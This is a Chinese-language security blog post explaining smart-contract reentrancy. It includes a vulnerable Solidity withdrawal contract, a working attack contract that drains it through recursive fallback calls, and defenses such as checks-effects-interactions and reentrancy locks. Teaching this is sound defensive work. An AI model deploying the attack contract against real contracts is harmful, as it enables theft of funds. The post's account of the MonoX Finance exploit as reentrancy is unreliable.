重入漏洞深度剖析：从原理到实战防护

查找币:余老师 | 漏洞披露 | 2026-05-10 04:00 | 2 次浏览 | 0 条回复

查找币漏洞披露安全研究 Web3安全区块链安全

## 背景概述在智能合约安全领域，重入漏洞堪称“经典中的经典”。据统计，近年来因重入攻击导致的资产损失已高达数亿美元，其中不乏知名DeFi项目。作为查找币安全团队的技术研究人员，我们注意到许多开发者对这类漏洞的认知仍停留在表面，缺乏系统性的防御思维。本文将从技术原理出发，结合实际案例，为读者全面解析重入漏洞的识别、利用与防护。 ## 前置知识：重入漏洞的本质 ### 什么是重入漏洞？以太坊智能合约的核心特性之一是合约间的外部调用能力。当合约A调用合约B时，合约B可以反过来调用合约A，形成**递归调用链**。这种看似正常的交互机制，在某些场景下会演变成致命漏洞。 **关键风险点**： - 合约在接收ETH时会自动触发`fallback`或`receive`函数 - 这些回调函数属于“隐藏的外部调用”，开发者容易忽视 - 攻击者可利用回调函数重新进入原合约，执行非预期的逻辑 ### 漏洞定义可以明确：**所有合约中的外部调用都是潜在的重入攻击入口**。当目标合约在状态更新前发起外部调用，攻击者就能通过恶意合约的回调函数，在状态未更新前反复执行敏感操作，从而耗尽合约资产。 ## 漏洞示例：典型的重入漏洞合约以下是一个看似普通但存在严重漏洞的充提币合约： ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.3; contract EtherStore { mapping(address => uint) public balances; function deposit() public payable { balances[msg.sender] += msg.value; } function withdraw() public { uint bal = balances[msg.sender]; require(bal > 0); // 危险！先转账后更新状态 (bool sent, ) = msg.sender.call{value: bal}(""); require(sent, "Failed to send Ether"); balances[msg.sender] = 0; // 状态更新在外部调用之后 } function getBalance() public view returns (uint) { return address(this).balance; } } ``` ## 漏洞深度分析 ### 攻击路径推演 1. **外部调用风险**：`withdraw`函数中的`msg.sender.call{value: bal}`是外部调用，攻击者可部署恶意合约作为接收方 2. **状态更新滞后**：余额清零操作`balances[msg.sender] = 0`在转账之后执行，形成时序漏洞 3. **递归调用可能**：攻击合约的`fallback`函数可再次调用`withdraw`，在余额未更新前重复提币 ### 攻击合约实现 ```solidity contract Attack { EtherStore public etherStore; constructor(address _etherStoreAddress) { etherStore = EtherStore(_etherStoreAddress); } // 当EtherStore发送ETH时触发 fallback() external payable { if (address(etherStore).balance >= 1 ether) { etherStore.withdraw(); // 递归调用提币 } } function attack() external payable { require(msg.value >= 1 ether); etherStore.deposit{value: 1 ether}(); etherStore.withdraw(); // 触发攻击链 } } ``` **攻击流程**： 1. 攻击合约先存入1 ETH 2. 调用`withdraw`发起提币 3. 合约转账时触发攻击合约的`fallback` 4. `fallback`中再次调用`withdraw`（此时余额未清零） 5. 重复步骤3-4，直到合约余额被掏空 ## 防护方案：双重保险策略 ### 方案一：遵循Checks-Effects-Interactions模式 **核心原则**：先检查条件 → 更新状态 → 最后进行外部交互 ```solidity function withdraw() public { uint bal = balances[msg.sender]; require(bal > 0); // 先更新状态 balances[msg.sender] = 0; // 最后进行外部调用 (bool sent, ) = msg.sender.call{value: bal}(""); require(sent, "Failed to send Ether"); } ``` ### 方案二：使用重入锁（Reentrancy Guard） ```solidity contract ReEntrancyGuard { bool internal locked; modifier noReentrant() { require(!locked, "No re-entrancy"); locked = true; _; locked = false; } } // 在敏感函数上应用 function withdraw() public noReentrant { // 函数体 } ``` ### 方案三：组合防御实际生产环境建议同时采用上述两种方案，形成纵深防御体系。 ## 审计实战要点作为安全审计人员，需要重点关注以下方面： ### 高危信号识别 - 所有`call`、`delegatecall`、`send`、`transfer`操作 - 外部合约接口调用（如`IERC20.transfer`） - 复杂合约继承链中的隐式调用 ### 审计检查清单 1. **状态更新顺序**：检查所有外部调用前是否已完成关键状态更新 2. **回调函数风险**：评估目标合约的`fallback`/`receive`是否可能被利用 3. **跨函数重入**：检查是否存在多个函数间的交叉重入路径 4. **跨合约重入**：分析合约间的依赖关系，识别间接重入点 ## 实战案例：MonoX Finance攻击复盘 2021年11月，DeFi项目MonoX Finance遭受重入攻击，损失约3100万美元。攻击者利用其`swap`函数中未正确更新的池子状态，通过递归调用耗尽流动性池。 **关键教训**： - 即使遵循了Checks-Effects-Interactions模式，仍需注意跨合约的状态一致性 - 复杂业务逻辑中的隐式重入路径更难发现，需借助形式化验证工具 ## 总结与建议重入漏洞虽经典，但在实际审计中仍频繁出现。我们建议： 1. **开发者**：将Checks-Effects-Interactions作为编码铁律，配合重入锁使用 2. **审计人员**：建立外部调用风险矩阵，系统化排查潜在重入点 3. **项目方**：在合约上线前进行专业审计，并部署监控告警系统 --- 本文由查找币安全团队整理发布查找币始终致力于Web3安全生态建设，为开发者提供专业的安全审计服务与漏洞预警。更多安全技术分享，请关注我们的官方渠道。

重入漏洞深度剖析：从原理到实战防护

查找币安全研究院

主题延伸阅读